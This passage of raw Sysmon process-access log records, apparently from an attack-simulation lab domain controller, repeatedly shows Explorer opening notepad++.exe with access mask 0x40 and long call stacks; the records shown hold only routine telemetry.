Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 